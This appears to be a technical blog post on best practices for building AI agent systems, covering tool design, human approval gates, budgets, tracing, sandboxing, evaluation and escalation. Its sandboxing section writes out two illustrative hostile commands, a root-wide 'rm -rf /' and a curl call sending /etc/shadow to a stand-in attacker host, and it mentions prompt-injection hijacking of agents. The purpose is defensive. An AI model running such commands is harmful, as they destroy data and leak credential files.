AI Agents Best Practices: Building Reliable, Safe, and Effective Agent Systems

AI agents — systems that use an LLM to reason, plan, and act in a loop — are among the most powerful patterns in modern AI engineering. They are also among the most fragile. A well-designed agent can autonomously resolve customer issues, write and ship code, or orchestrate multi-step research workflows. A poorly designed one will loop forever, burn through your API budget, take destructive actions, and produce confidently wrong results.

This post distils the best practices for building production-grade AI agents, catalogues the most common mistakes (and how to avoid them), and grounds everything in real-world examples and primary sources you can trace.


1. Start Simple, Then Layer Complexity

The single most important principle in agent design is incremental complexity. Most agent failures in practice stem not from missing capabilities, but from premature architectural complexity.

The Practice

Begin with the simplest architecture that could work:

  1. Single LLM call — Can prompt engineering solve this without an agent at all?
  2. Single-agent ReAct loop — One LLM with a few well-chosen tools in a reason → act → observe cycle.
  3. Multi-agent collaboration — Only when a single agent demonstrably fails due to context limits, role confusion, or task breadth.
Figure: Escalate from prompt-only flows to single-agent loops and only then to multi-agent orchestration when the simpler design clearly fails.

“The best agent is the simplest one that solves your problem.” — Harrison Chase, CEO of LangChain (LangChain Blog, 2024)

Why It Matters

Every additional agent, tool, or orchestration layer multiplies the failure surface. A multi-agent system with 4 agents making 10 tool calls each has 40 potential failure points in a single run. Anthropic’s guide on building effective agents explicitly recommends starting with augmented LLMs and only graduating to full agents when simpler patterns fall short.

Common Mistake: Over-Engineering from Day One

Teams frequently start with a multi-agent orchestration framework (CrewAI, AutoGen) before proving that a single ReAct agent can’t handle the task. This leads to:

  • Debugging nightmares — When something goes wrong in a 4-agent pipeline, isolating the failure requires tracing across multiple agent contexts.
  • Inflated costs — Each agent in the pipeline makes its own LLM calls; a 4-agent system easily costs 4–10× more than a single agent.
  • Slower iteration — Changing one agent’s behaviour can have cascading effects on others.

How to avoid it: Build a single-agent prototype first. Measure where it fails. Only add agents to address specific, documented shortcomings.

❌ Day 1: "We need a researcher agent, a planner agent, a coder agent,
          and a reviewer agent orchestrated by a supervisor."

✅ Day 1: "Let's build one ReAct agent with search and code-execution tools.
          We'll add specialization only if it can't handle the task."

2. Design Tools for the LLM, Not for Humans

Tools are the agent’s hands. The quality of your tool design is often the single biggest lever on agent reliability — more impactful than prompt engineering or model selection.

The Practice

Design every tool as if the LLM is a new developer reading the API documentation for the first time:

  • Clear, descriptive names — search_customer_orders is better than query_db. The LLM uses the tool name and description to decide when to call it.
  • Narrow scope — One tool, one job. A get_order_status(order_id) tool is far more reliable than a generic run_sql(query) tool.
  • Structured inputs and outputs — Use explicit JSON schemas with required fields, enums, and descriptions. Return structured data, not free text.
  • Actionable error messages — Return errors that tell the agent what went wrong and what to try next, not generic “500 Internal Server Error.”
  • Idempotent where possible — Tools that can be safely retried prevent failures from cascading.
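The “actionable error messages” bullet is worth making concrete. A minimal sketch, assuming a hypothetical get_order tool (the error fields and wording are illustrative, not from any particular framework):

```python
def get_order(order_id: str) -> dict:
    """Illustrative tool wrapper that returns actionable, structured errors."""
    if not order_id.startswith("ORD-"):
        # Tell the agent what went wrong AND what to try next,
        # instead of a generic "500 Internal Server Error".
        return {
            "error": "invalid_order_id",
            "message": (
                f"'{order_id}' is not a valid order ID. Order IDs look like "
                "'ORD-12345'. If you only have a customer ID, call "
                "search_orders(customer_id) first."
            ),
        }
    return {"order_id": order_id, "status": "shipped"}  # stub lookup
```

Because the error names a concrete next step, the agent can recover in one turn rather than retrying the same bad call.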

Why It Matters

The Toolformer paper (Schick et al., 2023) demonstrated that LLMs select tools based primarily on their descriptions. Vague or overlapping tool descriptions cause the model to pick the wrong tool or call tools with incorrect parameters — a failure mode that compounds across multi-step agent runs.

OpenAI’s own function calling best practices emphasise that “the description field is the most important part of a function definition” and recommend writing descriptions “as if you are writing documentation for a junior developer.”

Example: Good vs. Bad Tool Design

{
  "bad_tool": {
    "name": "db",
    "description": "Query the database",
    "parameters": {
      "q": { "type": "string" }
    }
  },
  "good_tool": {
    "name": "get_customer_order_history",
    "description": "Retrieve the last N orders for a customer. Returns order ID, date, total, and status. Use this when the user asks about their past orders or order history.",
    "parameters": {
      "customer_id": {
        "type": "string",
        "description": "The unique customer identifier (e.g., 'CUST-12345')"
      },
      "limit": {
        "type": "integer",
        "description": "Maximum number of orders to return (default: 10, max: 50)",
        "default": 10
      },
      "status_filter": {
        "type": "string",
        "enum": ["all", "pending", "shipped", "delivered", "cancelled"],
        "description": "Filter orders by status. Use 'all' to return orders of any status.",
        "default": "all"
      }
    },
    "required": ["customer_id"]
  }
}

Common Mistake: Giving the Agent a Swiss-Army-Knife Tool

A single execute_sql(query) or run_code(code) tool gives the agent maximum flexibility — and maximum opportunity to cause damage. The agent can write arbitrary queries, access tables it shouldn’t, or construct malformed SQL that corrupts data.

How to avoid it: Decompose broad capabilities into narrow, purpose-built tools. If the agent needs to access order data, give it get_order(id), search_orders(customer_id, date_range), and cancel_order(order_id) — not raw database access.


3. Implement Human-in-the-Loop for High-Stakes Actions

Not every tool call should execute automatically. High-stakes actions require human approval before execution.

The Practice

Classify every tool into one of three tiers:

| Tier | Risk Level | Examples | Approval |
| --- | --- | --- | --- |
| Read-only | Low | Search, fetch data, read files | Auto-execute |
| Reversible writes | Medium | Create draft, add to cart, stage changes | Auto-execute with logging |
| Irreversible / high-impact | High | Send email, delete records, deploy code, process payment | Require human approval |

Implement a confirmation gate that pauses the agent loop before executing high-risk tools and presents the proposed action to the user for review.

Figure: A confirmation gate interrupts the loop before sensitive actions and gives a human reviewer the final say.

Why It Matters

OWASP’s Top 10 for LLM Applications identifies “Excessive Agency” as a critical risk: agents that autonomously perform actions with real-world consequences without adequate oversight. The risk is amplified by prompt injection — a malicious instruction embedded in a retrieved document or user input can hijack the agent into calling destructive tools.

Anthropic’s building effective agents guide explicitly recommends human-in-the-loop controls: “For high-stakes tasks, build in confirmation steps where the agent presents its planned actions for approval before executing.”

Example: Confirmation Gate in LangGraph

from langgraph.prebuilt import create_react_agent
from langgraph.checkpoint.memory import MemorySaver

# Tool names that require human approval before execution
sensitive_tools = {"send_email", "delete_record", "process_refund"}

agent = create_react_agent(
    model,
    tools,
    checkpointer=MemorySaver(),
    interrupt_before=["tools"],  # Pause the graph before the tool-execution node
)

config = {"configurable": {"thread_id": "support-session-1"}}
state = agent.invoke({"messages": [("user", user_request)]}, config)

# While the graph is paused, review the pending tool call
tool_call = state["messages"][-1].tool_calls[0]
if tool_call["name"] in sensitive_tools:
    print(f"\n⚠️  Agent wants to execute: {tool_call['name']}")
    print(f"   Arguments: {tool_call['args']}")
    if input("   Approve? (yes/no): ").strip().lower() != "yes":
        raise SystemExit("Action rejected by human reviewer.")

agent.invoke(None, config)  # Resume: non-sensitive calls pass straight through

Common Mistake: “The Agent Is Autonomous, So No Human Oversight Needed”

Teams that deploy agents with full write access to production systems — email, databases, deployment pipelines — without any approval gates inevitably face an incident where the agent takes an unintended destructive action. The 2024 Air Canada chatbot case — where an AI agent made up a bereavement discount policy and the company was held liable — illustrates the real-world legal and financial consequences.

How to avoid it: Default to requiring approval for any action that modifies external state. Relax constraints only after thorough testing and with robust logging.


4. Set Budgets and Guardrails to Prevent Runaway Agents

Agents operate in a loop. Without explicit limits, they can loop indefinitely, consuming unbounded tokens and time.

The Practice

Enforce hard limits on every agent run:

  • Maximum steps — Cap the number of reasoning-action iterations (e.g., 15–25 steps for most tasks).
  • Maximum tokens — Set a per-run token budget to prevent cost explosions.
  • Maximum wall-clock time — Timeout runs that exceed a reasonable duration.
  • Maximum tool calls per tool — Prevent the agent from repeatedly calling the same failing tool.
  • Fallback behaviour — When a limit is hit, the agent should gracefully return a partial result or escalate to a human, not crash silently.
Figure: Guardrails bound the agent loop with explicit limits and a graceful fallback instead of letting retries run forever.
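The per-tool cap from the list above takes only a few lines of application code. A sketch (the class name and default limit are arbitrary):

```python
from collections import Counter

class ToolBudget:
    """Caps how many times each tool may be called in a single agent run."""

    def __init__(self, max_calls_per_tool: int = 3):
        self.max_calls = max_calls_per_tool
        self.counts = Counter()

    def allow(self, tool_name: str) -> bool:
        """Return False once a tool has exhausted its per-run budget."""
        self.counts[tool_name] += 1
        return self.counts[tool_name] <= self.max_calls
```

In the agent loop, a False return triggers the fallback path: stop retrying that tool, return a partial result, or escalate to a human.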

Why It Matters

The SWE-agent analysis (Yang et al., 2024) showed that autonomous coding agents average 20–50 LLM calls per issue. Without caps, a confused agent can easily make 100+ calls on a single task, burning through hundreds of thousands of tokens. At GPT-4o pricing, a single runaway agent task can cost $5–$50 — and in a multi-tenant system, this adds up fast.

Harrison Chase, in his 2024 talk on agent reliability, noted that “the most common production agent bug is an infinite loop where the agent keeps retrying the same failing tool call.” Budget limits are the simplest and most effective mitigation.

Example: Budget Configuration

from langgraph.prebuilt import create_react_agent
import asyncio

agent = create_react_agent(model=llm, tools=tools)

# Hard limit on reasoning-action iterations, passed at invocation time
config = {"recursion_limit": 25}  # Max 25 steps before the run is aborted

# Application-level timeout (token budgets can be tracked the same way,
# e.g. via model callbacks)
async def run_with_budget(agent, input_message, max_seconds=120):
    try:
        return await asyncio.wait_for(
            agent.ainvoke(
                {"messages": [{"role": "user", "content": input_message}]},
                config,
            ),
            timeout=max_seconds,
        )
    except asyncio.TimeoutError:
        return {"error": f"Agent timed out after {max_seconds}s. Escalating to human."}

Common Mistake: No Limits on Agent Loops

Without explicit budgets, agents that encounter ambiguous tasks or flaky tools will retry indefinitely. This manifests as:

  • Cost spikes — A single agent run consuming $10–$50 in API calls.
  • Latency blowouts — Users waiting 5+ minutes for a response that should take 15 seconds.
  • Cascading failures — A stuck agent holding resources that block other requests.

How to avoid it: Set conservative limits from day one. A 25-step limit and 60-second timeout are reasonable starting points for most use cases. Monitor and adjust based on production telemetry.


5. Invest in Observability and Tracing

You cannot improve what you cannot see. Agent observability is not optional — it is a prerequisite for reliability.

The Practice

Log every step of the agent loop with full fidelity:

| What to Log | Why |
| --- | --- |
| LLM reasoning traces (chain-of-thought) | Understand why the agent chose an action |
| Tool calls (name, arguments) | Audit what the agent did |
| Tool outputs (full response) | Trace data flow and identify bad inputs |
| Token counts per step | Cost attribution and budget monitoring |
| Latency per step | Identify bottlenecks |
| Final outcome (success/failure/timeout) | Measure overall reliability |
| Error messages and retries | Debug failure patterns |
Figure: A useful agent trace records the full trajectory — reasoning, actions, outputs, timing, and outcome — not just the final answer.

Use a dedicated LLM observability platform rather than ad-hoc logging:

  • LangSmith — Full trajectory tracing, evaluation datasets, and prompt versioning for LangChain/LangGraph agents.
  • Arize Phoenix — Open-source LLM observability with trace visualization and embedding drift monitoring.
  • Braintrust — Evaluation and logging platform with support for agent trajectory scoring.

Why It Matters

The AgentBench paper (Liu et al., 2024) highlighted that agent evaluation is fundamentally different from traditional NLP evaluation. Success depends on the entire trajectory, not just the final answer. An agent that produces the right answer via a dangerous or wasteful path is still a failure from a production standpoint.

Chip Huyen, in AI Engineering (O’Reilly, 2025), dedicates an entire chapter to LLM application observability, arguing that “without tracing, you are debugging LLM applications with a blindfold on.” This applies doubly to agents, where a single run can span dozens of intermediate states.

Common Mistake: Logging Only the Final Answer

Teams that log only the agent’s final output lose all visibility into the reasoning process. When the agent produces a wrong answer or takes an unexpected action, there is no trail to diagnose the root cause — was it a bad tool call? A hallucinated plan? A retrieval failure?

How to avoid it: Instrument every step from day one. Treat agent traces like distributed system traces — each step is a “span” in the trajectory. Platforms like LangSmith render these as visual timelines, making debugging tractable.

[Step 1] LLM Reasoning: "The user wants to cancel order ORD-789. I need to look up the order first."
[Step 2] Tool Call: get_order(order_id="ORD-789")
[Step 3] Tool Output: {"status": "shipped", "carrier": "FedEx", "tracking": "FX123456"}
[Step 4] LLM Reasoning: "The order is already shipped. I should inform the user and offer alternatives."
[Step 5] Final Answer: "Order ORD-789 has already shipped via FedEx (tracking: FX123456)..."
         ✅ Success | 5 steps | 1,847 tokens | 2.3s
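Span-style tracing can start as a simple decorator before you adopt a dedicated platform. A sketch (the record fields are arbitrary; a real deployment would ship these records to a platform like LangSmith rather than keep them in an in-process list):

```python
import functools
import time

trace: list[dict] = []  # one record per "span" in the trajectory

def traced_tool(fn):
    """Log name, arguments, output, latency, and errors for every tool call."""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        record = {"tool": fn.__name__, "args": args, "kwargs": kwargs}
        try:
            record["output"] = fn(*args, **kwargs)
            return record["output"]
        except Exception as exc:
            record["error"] = repr(exc)
            raise
        finally:
            record["latency_s"] = round(time.perf_counter() - start, 4)
            trace.append(record)
    return wrapper

@traced_tool
def get_order(order_id: str) -> dict:
    return {"order_id": order_id, "status": "shipped"}  # stub tool
```

Even this crude version answers the key debugging questions: which tool ran, with what inputs, what it returned, and how long it took.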

6. Sandbox All Code Execution

If your agent executes code — and many do — that code must run in an isolated sandbox, never on the host system.

The Practice

  • Use containerized environments — Docker, E2B, or Firecracker microVMs provide process-level isolation.
  • Restrict network access — The sandbox should have no access to internal networks, production databases, or cloud metadata services unless explicitly granted.
  • Restrict filesystem access — Mount only the directories the agent needs, read-only where possible.
  • Time-limit execution — Kill processes that exceed a wall-clock timeout (e.g., 30 seconds for code execution).
  • Drop privileges — Run as a non-root user with minimal permissions.
Figure: Agent-generated code should cross a hard isolation boundary into a constrained sandbox instead of running on the host.
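The isolation bullets above map directly onto container flags. A sketch that assembles a hardened docker run invocation (the flag set is a starting point, not a complete security policy; the image name and mount paths are placeholders):

```python
def sandbox_command(image: str, code_path: str, timeout_s: int = 30) -> list[str]:
    """Build a docker run argv implementing the restrictions above."""
    return [
        "docker", "run", "--rm",
        "--network", "none",                     # no network access
        "--read-only",                           # read-only root filesystem
        "--user", "65534:65534",                 # run as nobody, not root
        "--memory", "512m", "--cpus", "1",       # bound resources
        "-v", f"{code_path}:/work/main.py:ro",   # mount only what's needed
        image,
        "timeout", str(timeout_s),               # wall-clock kill switch
        "python", "/work/main.py",
    ]
```

Building the argv as a list (rather than a shell string) also avoids shell-injection issues when the path comes from untrusted input.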

Why It Matters

The OWASP Top 10 for LLM Applications lists “Insecure Output Handling” and “Excessive Agency” as top risks. An agent that generates and executes code on the host system is one prompt injection away from data exfiltration, resource abuse, or system compromise.

Simon Willison, a leading voice on LLM security, has extensively documented how prompt injection in multi-modal and tool-using LLMs can lead to arbitrary code execution when sandboxing is absent.

Example: Sandboxed Code Execution with E2B

from e2b_code_interpreter import Sandbox

# Create an isolated sandbox for the agent's code execution
with Sandbox() as sandbox:
    # The agent generates this code based on the user request.
    # Note: no leading indentation inside the string, so it parses as a script.
    agent_code = """\
import pandas as pd
df = pd.read_csv('/uploaded/sales_data.csv')
summary = df.groupby('region')['revenue'].sum().sort_values(ascending=False)
print(summary.to_markdown())
"""

    # Execute in the sandbox — isolated from the host system
    execution = sandbox.run_code(agent_code)
    print(execution.text)  # Safe output
    # Host filesystem, network, and processes are not accessible

Common Mistake: Running Agent-Generated Code on the Host

Teams that use subprocess.run() or exec() to execute agent-generated code on the production host are creating a critical security vulnerability. A single prompt injection or hallucinated command can:

  • Delete files (rm -rf /)
  • Exfiltrate secrets (curl attacker.com -d @/etc/shadow)
  • Install malware or crypto miners
  • Pivot to other internal systems

How to avoid it: Never execute agent-generated code outside a sandbox. Treat all agent-generated code as untrusted input — because it is.


7. Use Structured Outputs for Deterministic Tool Calls

When agents communicate with tools and downstream systems, structured outputs eliminate an entire class of parsing failures.

The Practice

Force the LLM to produce tool calls and intermediate results as validated JSON conforming to explicit schemas. Use:

  • OpenAI Structured Outputs — Guarantees JSON conformance via constrained decoding.
  • Instructor — Pydantic-based structured output extraction with automatic retries.
  • Outlines — Grammar-constrained generation for open-source models.

Why It Matters

In an agent loop, the LLM’s output at each step is parsed to determine the next action. If the output is malformed — missing a required field, using the wrong type, or including unexpected text — the entire loop breaks. In production, Jason Liu (creator of Instructor) reports that structured output enforcement reduces agent tool-call failures by 30–50% compared to freeform text parsing.

Example: Structured Tool Call with Instructor

import instructor
from openai import OpenAI
from pydantic import BaseModel, Field
from enum import Enum

class ToolChoice(str, Enum):
    SEARCH = "search_knowledge_base"
    GET_ORDER = "get_order"
    ESCALATE = "escalate_to_human"

class AgentAction(BaseModel):
    """The agent's next action, validated against a strict schema."""
    reasoning: str = Field(description="The agent's chain-of-thought reasoning for choosing this action")
    tool: ToolChoice = Field(description="Which tool to call next")
    arguments: dict = Field(description="Arguments to pass to the selected tool")

client = instructor.from_openai(OpenAI())

action = client.chat.completions.create(
    model="gpt-4o",
    response_model=AgentAction,
    messages=[
        {"role": "system", "content": "You are a customer service agent. Select the appropriate tool."},
        {"role": "user", "content": "Where is my order ORD-456?"}
    ]
)
# action.tool is guaranteed to be a valid ToolChoice enum value
# action.arguments is guaranteed to be a dict
# No parsing errors, no malformed JSON

Common Mistake: Parsing Agent Output with Regex

Teams that extract tool calls from freeform LLM text using regex or string matching are building on sand. Model output format varies between calls, models, and versions. A single extra newline, misplaced comma, or markdown formatting artifact breaks the parser.

How to avoid it: Use constrained decoding or a structured output library. Never rely on the LLM to “usually” produce valid JSON — enforce it mechanically.


8. Evaluate Agents on Trajectories, Not Just Final Answers

Traditional evaluation (comparing output to a gold-standard answer) is insufficient for agents. Two agents can produce the same correct answer via wildly different paths — one efficient and safe, the other wasteful and risky.

The Practice

Evaluate agents on multiple dimensions:

| Dimension | What to Measure | Example Metric |
| --- | --- | --- |
| Correctness | Is the final answer right? | Exact match, F1, human rating |
| Efficiency | How many steps/tokens did it take? | Steps to completion, total tokens |
| Tool accuracy | Did it call the right tools with the right args? | Tool call precision/recall |
| Safety | Did it avoid forbidden actions? | Violation count |
| Recovery | Did it handle errors gracefully? | Recovery rate after tool failures |
| Cost | What did the run cost? | Total API spend per task |

Build evaluation datasets of (task, expected trajectory, expected output) triples. Run the agent against this dataset regularly — ideally in CI/CD — to catch regressions.
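A minimal trajectory scorer along these lines might look as follows (the run and dataset record formats are invented for illustration):

```python
def score_trajectory(run: dict, expected: dict) -> dict:
    """Score one agent run on several of the dimensions above."""
    called = [step["tool"] for step in run["steps"]]
    expected_tools = expected["tools"]
    hits = len(set(called) & set(expected_tools))
    return {
        "correct": run["answer"] == expected["answer"],
        "tool_precision": hits / len(called) if called else 0.0,
        "tool_recall": hits / len(expected_tools) if expected_tools else 1.0,
        "steps": len(run["steps"]),
        "safety_violations": sum(
            step["tool"] in expected.get("forbidden", []) for step in run["steps"]
        ),
    }
```

Run it over the whole dataset in CI and track the aggregate numbers over time, exactly as you would a test suite's pass rate.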

Why It Matters

The AgentBench framework (Liu et al., 2024) demonstrated that evaluating agents on final answers alone misses critical failure modes. An agent that produces the right answer by reading a confidential file it shouldn’t have accessed is a security failure, not a success. The SWE-bench benchmark evaluates on full task resolution — the agent must produce a working patch, not just a plausible answer.

Chip Huyen in AI Engineering (O’Reilly, 2025) emphasises that “agent evaluation must be trajectory-aware” and recommends building evaluation harnesses that score intermediate steps, not just outcomes.

Common Mistake: “It Worked on My Demo”

A live demo where the agent completes a task is not an evaluation. Without a systematic dataset covering edge cases, error conditions, and adversarial inputs, you have no idea what your agent’s real failure rate is. Devin’s SWE-bench results — 13.86% resolution rate — illustrate that even state-of-the-art agents fail on the majority of tasks.

How to avoid it: Build a benchmark of 50–200 representative tasks from your domain. Run the agent against it weekly. Track pass rate, average steps, average cost, and safety violations over time. Treat it like a test suite.


9. Manage Context Window Carefully

The LLM’s context window is a scarce resource. In an agent loop, every reasoning step, tool call, and tool output accumulates in the context. Left unmanaged, the context fills up, performance degrades, and the agent starts losing track of earlier information.

The Practice

  • Summarize tool outputs — If a tool returns 5,000 tokens of raw data, summarize it to the relevant 200 tokens before appending to context.
  • Truncate conversation history — Keep the most recent N turns in full and summarize older turns.
  • Use retrieval over context — Instead of stuffing all relevant documents into context, store them externally and retrieve only what’s needed per step.
  • Reserve tokens for reasoning — If your model has a 128k context window, don’t fill 127k with data and leave only 1k for reasoning. A good rule of thumb is to reserve at least 20–30% of the window for the model’s own reasoning and output.
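A simple version of the truncate-and-summarise strategy (the summariser here is a stub; in practice you would ask the model to compress the older turns):

```python
def trim_history(messages: list[dict], keep_recent: int = 6) -> list[dict]:
    """Keep the system prompt and last N messages in full; compress the rest."""
    if len(messages) <= keep_recent + 1:
        return messages
    system = messages[0]                    # assume messages[0] is the system prompt
    older = messages[1:-keep_recent]
    recent = messages[-keep_recent:]
    # Stub summary: in production, call the LLM to summarize `older`.
    summary = {
        "role": "system",
        "content": f"[Summary of {len(older)} earlier messages omitted for brevity]",
    }
    return [system, summary, *recent]
```

Calling this before each LLM step keeps the context bounded no matter how long the run gets, at the cost of some fidelity in the older turns.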

Why It Matters

The “Lost in the Middle” paper (Liu et al., 2024) demonstrated that LLMs perform significantly worse when critical information is placed in the middle of a long context — they attend best to the beginning and end. For agents, this means that tool outputs from early steps can get “buried” as the context grows, leading to the agent forgetting its own earlier findings.

MemGPT (Packer et al., 2023) addresses this by treating the context window like virtual memory — paging information in and out as needed — demonstrating that active context management is essential for long-running agent tasks.

Common Mistake: Appending Everything to Context

The default behaviour in most agent frameworks is to append every tool call and tool output to the conversation history verbatim. For tools that return large JSON payloads, database query results, or full web pages, this fills the context window in a few steps, causing:

  • Context overflow — The run fails when the accumulated context exceeds the model’s window.
  • Attention degradation — The model “forgets” important earlier context as the window fills.
  • Increased cost — Every subsequent LLM call includes the full context, multiplying token costs.

How to avoid it: Implement a context management strategy from the start. Summarize large tool outputs, drop irrelevant history, and use retrieval for information the agent might need later.


10. Implement Graceful Failure and Escalation

Agents will fail. The question is whether they fail gracefully — informing the user and escalating to a human — or silently — producing wrong results or hanging indefinitely.

The Practice

Design explicit failure modes:

  • Tool failure — If a tool call fails after 2–3 retries, stop retrying. Return a clear error message and either try an alternative approach or escalate.
  • Confidence signals — When the agent is uncertain, it should express uncertainty rather than confabulate. Instruct the agent in its system prompt: “If you are not confident in your answer, say so and suggest the user contact support.”
  • Escalation path — Every production agent should have a defined handoff to a human agent. This is not a failure — it is a design feature.
  • Partial results — When hitting a budget or time limit, return whatever useful work was completed rather than nothing.
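The first and third bullets combine naturally into a small wrapper, sketched here with illustrative names:

```python
def call_with_escalation(tool, attempts: int = 3, **kwargs) -> dict:
    """Retry a flaky tool a bounded number of times, then hand off gracefully."""
    last_error = None
    for _ in range(attempts):
        try:
            return {"ok": True, "result": tool(**kwargs)}
        except Exception as exc:
            last_error = exc
    # Graceful failure: a clear message plus a handoff, not a silent crash.
    return {
        "ok": False,
        "error": f"{tool.__name__} failed after {attempts} attempts: {last_error}",
        "action": "escalate_to_human",
    }
```

The agent loop treats the "action": "escalate_to_human" result as a terminal state and routes the conversation to a person, with the error text preserved for the handoff.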

Why It Matters

Klarna’s AI assistant handles two-thirds of customer service chats — but the remaining third is seamlessly escalated to human agents. This graceful escalation is a key part of why the system succeeds: it doesn’t try to handle cases it can’t. Sierra AI builds this pattern into every customer service agent they deploy — the agent knows when to stop and hand off.

In AI Engineering (O’Reilly, 2025), Chip Huyen notes that “the most reliable AI systems are those that know what they don’t know” and recommends designing explicit uncertainty signaling and escalation paths as first-class features, not afterthoughts.

Common Mistake: Letting the Agent Confabulate When It’s Stuck

When an agent can’t find the answer or a tool fails, the default LLM behaviour is to generate a plausible-sounding but fabricated response. In a customer service context, this means the agent invents policies, makes up order numbers, or provides incorrect instructions — leading to customer harm and legal liability.

How to avoid it: Add explicit instructions in the agent’s system prompt to acknowledge uncertainty. Validate critical facts against tool outputs before presenting them to the user. Implement a fallback that routes to a human when confidence is low.

System prompt excerpt:
"If you cannot find the information needed to answer the user's question
after using your available tools, do NOT make up an answer. Instead, respond:
'I wasn't able to find that information. Let me connect you with a team member
who can help.' Then call the escalate_to_human tool."

Real-World Examples: Best Practices in Action

GitHub Copilot Agent Mode

GitHub Copilot’s agent mode embodies several best practices simultaneously:

  • Starts simple — Begins by reading relevant files and understanding the context before making changes.
  • Narrow, well-designed tools — Has specific tools for file reading, file editing, terminal commands, and code search — not a single “do anything” tool.
  • Human-in-the-loop — Requires user approval before executing terminal commands that could modify the system.
  • Observability — Each step (reasoning, tool call, output) is visible to the user in the IDE.
  • Budget limits — Operates within the IDE session context, preventing unbounded execution.
  • Graceful failure — When it encounters errors, it reports them and suggests next steps rather than silently failing.

Klarna AI Assistant

Klarna’s production agent demonstrates enterprise-grade best practices:

  • Scoped tools — The agent has specific tools for order lookup, refund processing, and FAQ retrieval — not raw database access.
  • Human escalation — Seamlessly hands off to human agents for complex cases, maintaining conversation context during the handoff.
  • Structured outputs — Responses follow consistent templates for refund confirmations, status updates, and policy explanations.
  • Guardrails — The agent cannot offer unauthorized discounts, access accounts without verification, or perform actions outside its defined scope.
  • Evaluation — Klarna tracks resolution rate, customer satisfaction (CSAT), and escalation rate continuously, catching regressions early.

Voyager (Minecraft Agent)

The Voyager research agent demonstrates best practices in autonomous learning:

  • Incremental complexity — Starts with simple goals (collect wood) and progressively tackles harder challenges (build structures, navigate caves).
  • Skill library — Reusable, tested code snippets stored for retrieval, implementing the “structured outputs” principle for action code.
  • Self-verification — After executing an action, Voyager checks whether it succeeded and iterates if not — embodying the “evaluate trajectories” principle.
  • Context management — Only retrieves relevant skills from its library for the current task, rather than loading everything into context.

Best Practices Checklist

Use this as a quick reference when designing and reviewing agent systems:

| # | Practice | Key Question |
| --- | --- | --- |
| 1 | Start simple | Can a single agent with basic tools solve this? |
| 2 | Design tools for the LLM | Are tool names, descriptions, and schemas crystal clear? |
| 3 | Human-in-the-loop | Are high-stakes actions gated on human approval? |
| 4 | Budgets and guardrails | Are step, token, and time limits enforced? |
| 5 | Observability | Is every step of every run logged and traceable? |
| 6 | Sandbox code execution | Is all generated code running in an isolated environment? |
| 7 | Structured outputs | Are tool calls validated against schemas, not parsed from freeform text? |
| 8 | Trajectory evaluation | Are agents tested on full trajectories, not just final answers? |
| 9 | Context management | Is the context window actively managed and summarized? |
| 10 | Graceful failure | Does the agent know when to stop and escalate to a human? |

References & Further Reading

Foundational Papers

  1. ReAct — Yao, S. et al. “ReAct: Synergizing Reasoning and Acting in Language Models”, ICLR 2023. The reasoning-action loop pattern that underpins most modern agent architectures.
  2. Toolformer — Schick, T. et al. “Toolformer: Language Models Can Teach Themselves to Use Tools”, NeurIPS 2023. Demonstrates that LLMs can learn when and how to call tools — making tool design critical to agent performance.
  3. Reflexion — Shinn, N. et al. “Reflexion: Language Agents with Verbal Reinforcement Learning”, NeurIPS 2023. Agents that improve by reflecting on their own failures — a key self-correction best practice.
  4. Voyager — Wang, G. et al. “Voyager: An Open-Ended Embodied Agent with Large Language Models”, 2023. Demonstrates skill libraries, self-verification, and incremental complexity in an autonomous agent.
  5. MemGPT — Packer, C. et al. “MemGPT: Towards LLMs as Operating Systems”, 2023. Virtual memory management for agents — the foundation of context management best practices.
  6. Lost in the Middle — Liu, N.F. et al. “Lost in the Middle: How Language Models Use Long Contexts”, TACL 2024. Reveals attention degradation in long contexts, motivating active context management for agents.

Evaluation and Benchmarks

  1. AgentBench — Liu, X. et al. “AgentBench: Evaluating LLMs as Agents”, ICLR 2024. Comprehensive benchmark demonstrating why agents must be evaluated on trajectories, not just final outputs.
  2. SWE-bench — Jimenez, C.E. et al. “SWE-bench: Can Language Models Resolve Real-World GitHub Issues?”, ICLR 2024. The gold-standard benchmark for coding agents — exposes the reliability gap in autonomous software engineering.
  3. SWE-agent — Yang, J. et al. “SWE-agent: Agent-Computer Interfaces Enable Automated Software Engineering”, 2024. Reveals the cost and step count of autonomous coding agents, motivating budget limits.

Multi-Agent Systems

  1. AutoGen — Wu, Q. et al. “AutoGen: Enabling Next-Gen LLM Applications via Multi-Agent Conversation”, 2023. Microsoft’s multi-agent framework — demonstrates when multi-agent architectures add value and when they add complexity.
  2. Agent Survey — Wang, L. et al. “A Survey on Large Language Model based Autonomous Agents”, 2023. Comprehensive overview of agent architectures, planning strategies, and memory designs.
  3. Chain-of-Thought Prompting — Wei, J. et al. “Chain-of-Thought Prompting Elicits Reasoning in Large Language Models”, NeurIPS 2022. The reasoning technique that powers agent planning modules.

Safety and Security

  1. OWASP Top 10 for LLM Applications — OWASP Foundation, 2023–2025. Industry-standard security risks for LLM applications, including “Excessive Agency” — essential reading for anyone deploying agents.
  2. Prompt Injection — Greshake, K. et al. “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection”, 2023. Demonstrates how prompt injection can hijack agent tool calls — motivating sandboxing and approval gates.

Industry Guides

  1. Building Effective Agents — Anthropic, “Building effective agents”, 2024. Anthropic’s practical guide to agent design — recommends starting simple, human-in-the-loop, and incremental complexity.
  2. OpenAI Function Calling Best Practices — OpenAI, “Function calling guide”, 2024. Official guidance on tool design, descriptions, and structured outputs for agent systems.

Books

  1. Stuart Russell & Peter Norvig — Artificial Intelligence: A Modern Approach, 4th ed., Pearson, 2020. The definitive textbook on intelligent agents. Chapters 2–4 define the agent concept, environment types, and rational behaviour that LLM agents inherit.
  2. Chip Huyen — AI Engineering, O’Reilly, 2025. Covers building LLM applications in production, including agent architectures, observability, evaluation, and deployment patterns. The most relevant production guide for agent builders.
  3. Jay Alammar & Maarten Grootendorst — Hands-On Large Language Models, O’Reilly, 2024. Practical guide with code examples covering prompt engineering, RAG, tool use, and the agent patterns these best practices build on.
  4. Sebastian Raschka — Build a Large Language Model (From Scratch), Manning, 2024. Understand the LLM internals — pre-training, fine-tuning, RLHF — that power the reasoning engine at the core of every agent.
  5. Harrison Chase & Jacob Lee — LangChain Documentation & Guides, LangChain, 2023–2026. The most widely adopted framework for building agents, with tutorials on ReAct, tool design, and multi-agent patterns.

Tools & Platforms

  1. LangSmith — Observability, tracing, and evaluation platform for LLM applications and agents. The go-to for trajectory-level debugging.
  2. Arize Phoenix — Open-source LLM observability with trace visualization and embedding analysis.
  3. Braintrust — Evaluation and logging platform with support for agent trajectory scoring and regression detection.
